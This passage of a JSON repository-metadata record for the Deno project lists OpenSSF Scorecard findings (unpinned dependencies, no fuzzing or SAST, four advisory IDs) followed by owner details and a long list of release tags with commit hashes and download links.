.devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_j